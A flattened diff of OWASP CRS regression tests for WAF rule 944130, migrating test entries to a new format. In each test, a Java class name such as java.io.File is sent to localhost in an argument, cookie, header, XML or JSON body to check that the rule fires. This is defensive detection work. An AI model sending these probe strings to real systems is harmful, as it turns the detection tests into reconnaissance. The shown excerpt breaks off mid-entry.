"/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log: + expect_ids: [944130] + - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 